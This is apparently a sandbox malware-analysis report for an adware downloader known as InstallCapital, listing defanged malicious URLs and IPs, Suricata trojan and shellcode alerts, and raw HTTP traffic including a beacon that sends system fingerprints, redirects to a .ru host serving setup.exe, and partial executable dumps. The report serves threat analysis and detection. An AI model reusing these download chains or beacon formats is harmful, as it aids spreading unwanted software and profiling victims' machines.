hxxp://ee.ilentialnessme.bid/report.php?typ=sys&affId=1006&instId=11&ho_transId=1022cfb36461ebc8195bc69760cdf1&transId=135176390&chk_s_b=VMware-56 4d 22 96 65 fe b6 85-36 78 73 8e 10 74 4e 8c&chk_s_v=HPQOEM - 6040000&chk_c_ma=VMware, Inc.&chk_c_mo=VMware Virtual Platform&chk_mac=00:50:56:33:B5:51&randid=0.44531263149565414 54.88.21.193
hxxp://ee.ilentialnessme.bid/report.php?typ=conversion&transId=135176390&affId=1006&instId=11&ho_transId=1022cfb36461ebc8195bc69760cdf1&s1=117&s2=151377&s3=&s4=&s5=1399165537&cid=5c12d1104cca24294ae7d8d45ce8d028&uac=true&randid=0.3799597195784592 54.88.21.193
hxxp://d1gahxamcuu9d3.cloudfront.net/stub_maker_uk2.php?url=hxxp://gurusetman.info/taveara?q=setup&name=Installation
hxxp://gurusetman.info/taveara?q=setup 104.18.40.31
hxxp://greates.info/?ad=2&ver=1&sid=8251&url=http://aclick.adhoc2.net/9AqV-Sgf7ELvPEipl_Cbxm?tt=2&var1=&var2=&var3=9999&name=setup&type=setup&size=3145728&sub_id=346&sub_id2=Kt86-ZfR0bKuZsB7kP3NNhupjIn3i4ti9tLLSX3ap6d1wZXY2bMx_MzcZD4ka-au6b9eF9GlKWFnnbgrmIpGWgtbX_Ngr0gZZWB5Fq21jfakgCiJWr 104.27.151.43
hxxp://oblo.raidedsentry.ru/0nIydlSpN0ZrFmZqFjMxZUNCdlWadGMydmTfhlY0d2VHBXStJ3Zi5mbGd1SsdUOGVWOiZTdh1SYrRDRaNmeN9FeNJmMZhlW3FDZ2AXYzg1UMxEd5kGd0k2MulkawVHaO50MQt2NCNnW1tkYwIlZa1iN4Q3SiojIyQWafJWdzJCLiYDNzIiOiQWafJWdzJCLigjM3UDNxMjI6ISZ6l2ciwiIwVHdlNnI6ISZwlHdiwiIwVHdlNnI6ISZtFmbiwiI5kTO50zMyFmdm0jMyFmdm0TMyFmdmITP0R3PthnYD9FbwlWRQZHTFdjZnNVLWFXQ58CX0VmbuIzYvhGZh5yajlGbjF2Lc9CX6AHd0hmI6ICbyVnIsISM1IDOiojIkl2ciwiIxIiOiIXZ2Jye
hxxp://dualstack.ils-front-balancer3-264552681.us-east-1.elb.amazonaws/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png
hxxp://dualstack.ils-front-balancer3-264552681.us-east-1.elb.amazonaws/index.php
hxxp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/typ_1.html 52.222.174.240
hxxp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/css/style.css 52.222.174.240
hxxp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/img/icon1-green.png 52.222.174.240
hxxp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/img/icon2-green.png 52.222.174.240
hxxp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/img/icon3-green.png 52.222.174.240
hxxp://n135adserv.com/js/show_ads_supp.js?pubId=907
hxxp://ic-dc.deliverydlcenter.com/favicon.ico 52.222.174.240
hxxp://ee.ilentialnessme.bidhxxp://ee.ilentialnessme.bid/installer.php?affId=2291&instId=2180&ho_trackingid=1022cfb36461ebc8195bc69760cdf1&trackingId=135176390&cc=UA&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 54.88.21.193
hxxp://www.1-1ads.com/js/show_ads_supp.js?pubId=907 212.124.124.178
hxxp://ee.ilentialnessme.bidhxxp://ee.ilentialnessme.bid/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=117&aff_sub2=151377&aff_sub3=&aff_sub4=&aff_sub5=1399165537&url=http://ee.ilentialnessme.bid/offer.php?affId={aff_id}&trackingId=135176390&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 54.88.21.193
hxxp://away.yosauruslega.bid/get.php?ses=429155916441231936
hxxp://www.dosecuretrips.com/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png 107.20.147.93
hxxp://ee.ilentialnessme.bidhxxp://ee.ilentialnessme.bid/offer.php?affId=2291&trackingId=135176390&instId=2180&ho_trackingid=1022cfb36461ebc8195bc69760cdf1&cc=UA&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 54.88.21.193
hxxp://wet.sodcattilyrem.bid/stub_maker_uk2.php?url=hxxp://gurusetman.info/taveara?q=setup&name=Installation 52.222.174.135
hxxp://www.selfdislikedfarfet.site/index.php 107.20.147.93
hxxp://win.ketydesmidiana.bidhxxp://win.ketydesmidiana.bid/aff_c?offer_id=4&aff_id=2291&source=2180&aff_sub=0&aff_sub2=0&aff_sub3=&aff_sub4=&aff_sub5=0&url=http://ee.ilentialnessme.bid/offer.php?affId={aff_id}&trackingId=135176390&instId=2180&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 54.246.201.113


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Backdoor User-Agent (InstallCapital)
ET POLICY PE EXE or DLL Windows file download HTTP
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET MALWARE SoundCloud Downloader Install Beacon
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/css/style.css HTTP/1.1
Accept: text/css
Referer: hXXp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/typ_1.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ic-dc.deliverydlcenter.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: text/css
Content-Length: 1967
Connection: keep-alive
Date: Mon, 10 Oct 2016 08:52:43 GMT
Last-Modified: Fri, 07 Oct 2016 08:02:49 GMT
ETag: "92657668b4257695bd2699a787aee60b"
Accept-Ranges: bytes
Server: AmazonS3
Age: 64444
X-Cache: Hit from cloudfront
Via: 1.1 e7ce333c56f455a0dae7f1f5ea5d6086.cloudfront.net (CloudFront)
X-Amz-Cf-Id: fhHJWlc0aTPvIif0TAxqMwP162bjl_kkLruNbHh_EQJHE-Lfs25efg==
body{...margin: 0;...padding: 0;...font-family: Helvetica, Arial, sans
-serif;..}..h1{...margin: 0;...font-size: 28px;...font-weight: normal;
...text-align: center;...color: #333;..}...container{...margin: 0 auto
;...width: 980px;...padding-left: 20px;...padding-right: 20px;..}...he
ader h1.typ{...line-height: 80px;...padding-top: 0;..}...header h1{...
padding-top: 13px;..}...header h1 span{...display: block;...font-size:
 14px;..}...header-top, .header-bottom{...position: relative;...height
: 80px;...width: 100%;..}...header-top.green{...background: #22B573;..
}...header-top.blue{...background: #0461C9;..}...header-bottom.grey{..
.background: #CCCCCC;..}...header-bottom.light-blue{...background: #B6
D2F2;...border-bottom:1px solid #02294C;..}..#widget{...margin: 0 auto
;...margin-top: 50px;...margin-bottom: 150px;..}...footer{...position:
 relative;...width: 100%;...height: 216px;...background: #e5e5e5;...bo
rder-top: 1px solid #fff;...-webkit-box-sizing: border-box;...-moz-box
-sizing: border-box;...box-sizing: border-box;..}...footer:before{...p
osition: absolute;...left: 0;...right: 0;...top: -2px;...height: 1px;.
..width: 100%;...content: '';.....}...footer.green:before{...backgroun
d: #0F4C2E;..}...footer.blue:before{...background: #02294C;..}...foote
r h3{...margin-top: 38px;...margin-bottom: 28px;...font-size: 18px;...
text-align: center;...text-shadow: -1px 1px 0 #fff;..}...footer h3.gre
en{...color: #22B573;..}...footer h3.blue{...color: #0461C9;..}..ul.st
eps{...margin: 0;...padding: 0;...list-style-type: none;..}..ul.st
<<< skipped >>>


GET /?ad=2&ver=1&sid=8251&url=http://aclick.adhoc2.net/9AqV-Sgf7ELvPEipl_Cbxm?tt=2&var1=&var2=&var3=9999&name=setup&type=setup&size=3145728&sub_id=346&sub_id2=Kt86-ZfR0bKuZsB7kP3NNhupjIn3i4ti9tLLSX3ap6d1wZXY2bMx_MzcZD4ka-au6b9eF9GlKWFnnbgrmIpGWgtbX_Ngr0gZZWB5Fq21jfakgCiJWr HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
Host: greates.info
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 302 Moved Temporarily
Date: Sun, 13 Nov 2016 05:19:19 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d173566d0828d0aa2e2d9476f9244ccef1479014359; expires=Mon, 13-Nov-17 05:19:19 GMT; path=/; domain=.greates.info; HttpOnly
X-Powered-By: PHP/5.4.16
Location: hXXp://oblo.raidedsentry.ru/0nIydlSpN0ZrFmZqFjMxZUNCdlWadGMydmTfhlY0d2VHBXStJ3Zi5mbGd1SsdUOGVWOiZTdh1SYrRDRaNmeN9FeNJmMZhlW3FDZ2AXYzg1UMxEd5kGd0k2MulkawVHaO50MQt2NCNnW1tkYwIlZa1iN4Q3SiojIyQWafJWdzJCLiYDNzIiOiQWafJWdzJCLigjM3UDNxMjI6ISZ6l2ciwiIwVHdlNnI6ISZwlHdiwiIwVHdlNnI6ISZtFmbiwiI5kTO50zMyFmdm0jMyFmdm0TMyFmdmITP0R3PthnYD9FbwlWRQZHTFdjZnNVLWFXQ58CX0VmbuIzYvhGZh5yajlGbjF2Lc9CX6AHd0hmI6ICbyVnIsISM1IDOiojIkl2ciwiIxIiOiIXZ2Jye
Server: cloudflare-nginx
CF-RAY: 300fc4a1f37f2902-OTP
0..HTTP/1.1 302 Moved Temporarily..Date: Sun, 13 Nov 2016 05:19:19 GMT
..Content-Type: text/html..Transfer-Encoding: chunked..Connection: kee
p-alive..Set-Cookie: __cfduid=d173566d0828d0aa2e2d9476f9244ccef1479014
359; expires=Mon, 13-Nov-17 05:19:19 GMT; path=/; domain=.greates.info
; HttpOnly..X-Powered-By: PHP/5.4.16..Location: hXXp://oblo.raidedsent
ry.ru/0nIydlSpN0ZrFmZqFjMxZUNCdlWadGMydmTfhlY0d2VHBXStJ3Zi5mbGd1SsdUOG
VWOiZTdh1SYrRDRaNmeN9FeNJmMZhlW3FDZ2AXYzg1UMxEd5kGd0k2MulkawVHaO50MQt2
NCNnW1tkYwIlZa1iN4Q3SiojIyQWafJWdzJCLiYDNzIiOiQWafJWdzJCLigjM3UDNxMjI6
ISZ6l2ciwiIwVHdlNnI6ISZwlHdiwiIwVHdlNnI6ISZtFmbiwiI5kTO50zMyFmdm0jMyFm
dm0TMyFmdmITP0R3PthnYD9FbwlWRQZHTFdjZnNVLWFXQ58CX0VmbuIzYvhGZh5yajlGbj
F2Lc9CX6AHd0hmI6ICbyVnIsISM1IDOiojIkl2ciwiIxIiOiIXZ2Jye..Server: cloud
flare-nginx..CF-RAY: 300fc4a1f37f2902-OTP..0..
<<< skipped >>>


POST /index.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: VVV.selfdislikedfarfet.site
Content-Length: 523
Connection: Keep-Alive
Cache-Control: no-cache

Net1.1=&Net2=3.5.30729.5420SP1&Net4=4.5.50709&OSversion=NT6.1SP1&Slv=&Sysid=541B298A93BFE2600111218F9ABFCC32&Sysid1=52D311BE788EE1E500992B8A6A042C2B&X64=N&admin=Y&browser=IE.HTTP&cavp=&chver=54.0.2840.59&cmdl=Setup__2140_il2.exe&dprod=D068E036AD104FFF0E13053E615F8D&dprod4=C275E3FEDEC17C9D31A2BE03568B64&exe=Setup__2140_il2&ffver=49.0.1.6109&lang_DfltUser=0409&mac=MDA1MDU2MzNCNTUxMDAwMAA=&machg=ODhkY2QzOTUtYjA2Mi00NWIzLWE2Y2QtNzlmMzdjMGViYTA4AA==&name=V0lOLVVLMEZGT084M0k2AA==&netfs=3&ts=1479014369&ver=1.1.5.26
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Sun, 13 Nov 2016 05:19:30 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
transfer-encoding: chunked
Connection: keep-alive
37c1....<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//
EN">.<html>.    <head>.        <meta http-equiv="con
tent-type" content="text/html; charset=UTF-8" /> .        <title
>DownloadManagerModern</title>...<script type="text/javasc
ript">...  var g_notCompatibleWithUpdaterComps = ['LootFindKP'];...
  var g_postponedComps = ['updater', 'Paltalk', 'SHAREit', 'JinshanDub
a',  'UCwebAccelerator', 'UltimateSecurityPackage' ,  'TotalSecurity',
 'TotalSecurityIN', 'TotalSecurityRU'];...</script> .        <
;base href="hXXp://VVV.selfdislikedfarfet.site:80/index.php" />.<
;link rel="stylesheet" type="text/css" href="hXXp://cdn2.leadingdownlo
ad.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css" />        <
;script type="text/javascript" src="hXXp://cdn1.leadingdownload.com/V3
8/amipb.js"></script>.        <script type="text/javascrip
t">.var g_r_appimageurl="http:\/\/pe-sixi.com\/img\/icon_installer.
png";..var g_r_appname="installer";..var g_r_cmdline="\/S";..         
   var g_amiobj = '', g_ami, g_updb = false, g_close = '1', g_addition
al_offer_list = '1';.            var g_finish_install_button = '1';.  
          var g_popup_install_all = '1';.            var g_eula = 'VGh
lIGRvd25sb2FkIGFuZCBpbnN0YWxsYXRpb24gcHJvY2VzcyBvZiB0aGlzIGZpbGUgaXMgc
nVuIGJ5IEluc3RhbGxQYXRoIEluc3RhbGwgTWFuYWdlci4KQnkgY2xpY2tpbmcgdGhlICJ
BY2NlcHQiIG9yICJOZXh0IiBidXR0b25zIGJlbG93LCBvciBieSBjb250aW51aW5nIHRoa
XMgSW5zdGFsbFBhdGggSW5zdGFsbCBNYW5hZ2VyIGluc3RhbGxhdGlvbiwgb3Igb3R
<<< skipped >>>


GET /0nIydlSpN0ZrFmZqFjMxZUNCdlWadGMydmTfhlY0d2VHBXStJ3Zi5mbGd1SsdUOGVWOiZTdh1SYrRDRaNmeN9FeNJmMZhlW3FDZ2AXYzg1UMxEd5kGd0k2MulkawVHaO50MQt2NCNnW1tkYwIlZa1iN4Q3SiojIyQWafJWdzJCLiYDNzIiOiQWafJWdzJCLigjM3UDNxMjI6ISZ6l2ciwiIwVHdlNnI6ISZwlHdiwiIwVHdlNnI6ISZtFmbiwiI5kTO50zMyFmdm0jMyFmdm0TMyFmdmITP0R3PthnYD9FbwlWRQZHTFdjZnNVLWFXQ58CX0VmbuIzYvhGZh5yajlGbjF2Lc9CX6AHd0hmI6ICbyVnIsISM1IDOiojIkl2ciwiIxIiOiIXZ2Jye HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
Host: oblo.raidedsentry.ru
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Sun, 13 Nov 2016 05:19:19 GMT
Content-Type: application/exe; charset=windows-1251
Content-Length: 4758720
Connection: keep-alive
X-Powered-By: PHP/5.4.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2016 05:19:19 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Disposition: attachment; filename="setup.exe"
Content-Transfer-Encoding: binary
Pragma: public
MZP.....................@.............................................
..!..L.!..This program must be run under Win32..$7....................
......................................................................
..............................................PE..L....^B*............
......$..f$.......$......0$...@...........................I.......H...
.......@............................1..7...P4..v...........|H.. ...@2.
.............................02.......................................
..............CODE....T.$.......$................. ..`DATA.........0$.
......$.............@...BSS...........0.......0..................idata
...7....1..8....0.............@....tls....0.... 2.......0.............
.....rdata.......02.......0.............@..P.reloc.......@2.......0...
..........@..P.rsrc....v...P4..x....3.............@..P..............&g
t;......0=.............@..P...........................................
......................................................................
.................................................@...Boolean..........
.@..False.True.@.,.@...WideChar..........D.@...Char..........X.@...Sma
llint..........p.@...Integer.............@...Byte............@...Word.
...........@...Cardinal............@...Int64...................@...Dou
ble..@...@...Real....@...Currency....@...ShortString...$.@...WordBool.
........ .@..False.True..L.@...LongBool.........H.@..False.True..t.@..
.String..@...WideString..@...Variant.@...@...OleVariant..@............
...................@.........0E@.<E@.@E@.DE@.8E@.lB@..B@..B@..T
<<< skipped >>>


GET /pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/img/icon1-green.png HTTP/1.1
Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5
Referer: hXXp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/typ_1.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ic-dc.deliverydlcenter.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/png
Content-Length: 3392
Connection: keep-alive
Date: Mon, 10 Oct 2016 08:52:43 GMT
Last-Modified: Fri, 07 Oct 2016 08:02:49 GMT
ETag: "122fe75beae30ff3ea83688e03402879"
Accept-Ranges: bytes
Server: AmazonS3
Age: 64443
X-Cache: Hit from cloudfront
Via: 1.1 d76fac2b5a2f460a1cbffb76189f59ef.cloudfront.net (CloudFront)
X-Amz-Cf-Id: zgILzJjnODf9_u3eKN_YRJY1_4NUoxU3WshC48sfjHLWtnBwAHE_Mg==
.PNG........IHDR...>...E......$UF....tEXtSoftware.Adobe ImageReadyq
.e<....IDATx..[{l[W.?..g..fvR.]..2.4.z.N..?jOC......C....IS[....%Y.
...........i].@..c.@.?Hs%.:&.....&..c.............#YIS...;.w.....cB.O.
.....GE.l.3.n7.2Rv..FQ..JF. ...Lt.....?..m.cN...'yK...k..Y..l.........
.j...qO:.?.......n...8K........K7<9X.db.$.....b.............=-.....
...<uhB..2......-/VI.Hzy.$."..?y...<.....-.iF..x.. ...N..ke....)
......!._.mJc..p,a.Z.Gd.x.(...p.......j....~3.. .I..a....~4...S...NN0f
.W..2.I.....t....i`..1d.6....E...^.oKGb$qm.}..;.f...g...h%x..t.K ..'..
.....(X...W.:...]#.p......>.._;.>j..{..V.(k.W...O\....oj..^.....
K.lq>.<.......eJ........?..Yp.`.Ic........F............OV.../...
n.....u.3...F..`... .....oj..b.......7"..;]i.B.. ...K.A{..W.^.g....9..
?}..p....R.M....i..N.D....;......QK..,".....9.....ub>...P.....g:9/.
..:?.y?..a8...L....L.b.s............W...O|.S...w*...3=..J.,...:...3ok.
.mz....W....E.S.F.N...99K.v.S.P.......].!ey:]#C..!.8 .W...D;dq.......&
gt;;...|Y.,3D.Gq.Mg.D..i.|..X.......[.@.s8.8sVD.*cYmj.=.3..2........W.
..vw...fy9^.....z......pEQ. ...Q....T....#.[/..t.0z.h!..>t.....%".B
l.{.<.{.JW.....?.3h.{w...(...DF..p...dV.}X....PJ...n.A.....o. p.(..
........H..3....H...N....F)p8....$.......Y....z:Tn.....W.q....6..D..G.
Ud.f.....C.X....D......N..{..T.j......../."..=...g..)..<(hwX.rf...0
...Z=J..=....1B..n.$U\.P.re.ku.u&8.nC.........W........so..../.O5...G.
....OB#%...x...~..`.;.....^.m."...........q..S]..T.....Fj)>...|.jZ.
..['.....:.s.x..O.m.....[....\$0..{..&.r...^.U...?.o..Y.......ZW].
<<< skipped >>>


GET /normal_bg.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: d2adi7hu49xk5t.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/jpeg
Content-Length: 26781
Connection: keep-alive
Date: Thu, 22 Sep 2016 18:01:12 GMT
Last-Modified: Mon, 13 Jun 2016 11:29:07 GMT
ETag: "b5b0ebe137c0293f816eaac3de2b4e51"
Accept-Ranges: bytes
Server: AmazonS3
Age: 39984
X-Cache: Hit from cloudfront
Via: 1.1 8d84df16ba20ff1d2ca3914948494e04.cloudfront.net (CloudFront)
X-Amz-Cf-Id: uBkHd_5RoRqHN9as-QnlhLcpdLg65yUcQ1ooISYFQfMUoHgFEyDRww==
......Exif..II*.................Ducky.......<.....3hXXp://ns.adobe.
com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?&g
t; <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-
c011 66.146729, 2012/05/03-13:40:03        "> <rdf:RDF xmlns:rdf
="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description
 rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="ht
tp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.
0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop Elements 12.0 W
indows" xmpMM:InstanceID="xmp.iid:889F23E5F49B11E4A1FBA1E3C36AE7EE" xm
pMM:DocumentID="xmp.did:889F23E6F49B11E4A1FBA1E3C36AE7EE"> <xmpM
M:DerivedFrom stRef:instanceID="xmp.iid:889F23E3F49B11E4A1FBA1E3C36AE7
EE" stRef:documentID="xmp.did:889F23E4F49B11E4A1FBA1E3C36AE7EE"/> &
lt;/rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpack
et end="r"?>....Adobe.d............................................
......................................................................
.................................E....................................
................................................!.1AQa...q.....2R..u.7
...."...U..B.....5.b..%4Tte'r.E..#$D......................!1."AQ2.a..B
R.q...b.#3.....r......S......C.............?....j9...n..OK....xr...8..
q.C..o..k.k..L[3...v....z.zqNi(...T..#.mJ..TU.....SYi.U.-[NJ9..e.IU.;.
k.KY...Rm..{.....K...M..D.b...E.;.k.K[..#&.kG.....F..........k~p., ...
.J. .0...K-7.(..m..2q...1.}.V.1l...U........E.....*..5..fi.Oe.{...
<<< skipped >>>


GET /appImg.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: d2adi7hu49xk5t.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/jpeg
Content-Length: 4628
Connection: keep-alive
Date: Thu, 22 Sep 2016 18:01:12 GMT
Last-Modified: Mon, 13 Jun 2016 11:29:06 GMT
ETag: "ba6c4124ad5d33528fe1d609e6ac1ff0"
Accept-Ranges: bytes
Server: AmazonS3
Age: 39984
X-Cache: Hit from cloudfront
Via: 1.1 bd3e2233bf25337a89461c638cad13b9.cloudfront.net (CloudFront)
X-Amz-Cf-Id: U-EUqNxZUN-BrxOxbK_UDEar3VnABPkQfmkMdNlTHZNm6Mm0Ye_qvA==
......Exif..II*.................Ducky.......<.....3hXXp://ns.adobe.
com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?&g
t; <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-
c011 66.146729, 2012/05/03-13:40:03        "> <rdf:RDF xmlns:rdf
="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description
 rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="ht
tp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.
0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop Elements 12.0 W
indows" xmpMM:InstanceID="xmp.iid:E39F75D6F49A11E4B7DAEACD8AA72C6E" xm
pMM:DocumentID="xmp.did:E39F75D7F49A11E4B7DAEACD8AA72C6E"> <xmpM
M:DerivedFrom stRef:instanceID="xmp.iid:E39F75D4F49A11E4B7DAEACD8AA72C
6E" stRef:documentID="xmp.did:E39F75D5F49A11E4B7DAEACD8AA72C6E"/> &
lt;/rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpack
et end="r"?>....Adobe.d............................................
......................................................................
...............................K.G....................................
....................................................!..1AQa.."R.T.q24D
.%...B#dEU'.bSc.5u&C$t.67(.....................!1AQa..."2BR.q...b....r
S.......#............?.<fnfHr.B..v.......ddD.P.Q5.(.(t.....%.KH....
,...@L..f.|?..4G.....[......b.......).4_....=.<.....o.....}....6..3
D....w........u.{..e.(...yN..f..sr......}...G.o......G\...-TBL.<fex
.=.;...u.;..vO6..}.:p...^"x...G.s...k.=....../.t....xg.4O..^..e..z
<<< skipped >>>


GET hXXp://win.ketydesmidiana.bid/aff_c?offer_id=4&aff_id=2291&source=2180&aff_sub=0&aff_sub2=0&aff_sub3=&aff_sub4=&aff_sub5=0&url=http://ee.ilentialnessme.bid/offer.php?affId={aff_id}&trackingId=135176390&instId=2180&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 HTTP/1.1
Host: win.ketydesmidiana.bid
Connection: close
Accept: */*
User-Agent: InstallCapital


HTTP/1.1 302 Found
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 13 Nov 2016 05:19:07 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Location: hXXp://ee.ilentialnessme.bid/offer.php?affId=2291&trackingId=135176390&instId=2180&ho_trackingid=1022cfb36461ebc8195bc69760cdf1&cc=UA&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2
P3P: CP="NOI CUR OUR NOR INT"
Pragma: no-cache
Server: nginx/1.7.9
Set-Cookie: enc_aff_session_4=ENC02854-1022cfb36461ebc8195bc69760cdf1-2291-4-0-0-0-0-UA-0-32313830-30-30-_-_-30-194.242.96.226-20161113001907-_-7A6E6C272A16063B3C1716017461103D5562581C522C06645C4244007D0960733C7E091640616B0D16; expires=Tue, 13 Dec 2016 05:19:07 GMT; path=/;
Set-Cookie: ho_mob=eyJtb2JpbGVfY2FycmllciI6Ij8iLCJ1c2VyX2FnZW50IjoiSW5zdGFsbENhcGl0YWwiLCJjb25uZWN0aW9uX3NwZWVkIjoiYnJvYWRiYW5kIn0=; expires=Tue, 08 Oct 2019 15:59:07 GMT; path=/;
tracking_id: 1022cfb36461ebc8195bc69760cdf1
X-Robots-Tag: noindex, nofollow
Content-Length: 453
Connection: Close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>302 Found</title>.</head><body
>.<h1>Found</h1>.<p>The document has moved <a 
href="hXXp://ee.ilentialnessme.bid/offer.php?affId=2291&trackingId
=135176390&instId=2180&ho_trackingid=1022cfb36461ebc8195bc6976
0cdf1&cc=UA&cc_typ=ho&sb=x86&wv=7sp1&db=InternetEx
plorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2">
here</a>.</p>.</body></html>...
<<< skipped >>>


GET /report.php?typ=conversion&transId=135176390&affId=1006&instId=11&ho_transId=1022cfb36461ebc8195bc69760cdf1&s1=117&s2=151377&s3=&s4=&s5=1399165537&cid=5c12d1104cca24294ae7d8d45ce8d028&uac=true&randid=0.3799597195784592 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: InstallCapital
Host: ee.ilentialnessme.bid


HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Sun, 13 Nov 2016 05:18:30 GMT
Content-Length: 0
HTTP/1.1 200 OK..Content-Type: text/html..Server: Microsoft-IIS/8.5..X
-Powered-By: PHP/5.3.28..Date: Sun, 13 Nov 2016 05:18:30 GMT..Content-
Length: 0..



GET /pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/img/icon2-green.png HTTP/1.1
Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5
Referer: hXXp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/typ_1.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ic-dc.deliverydlcenter.com
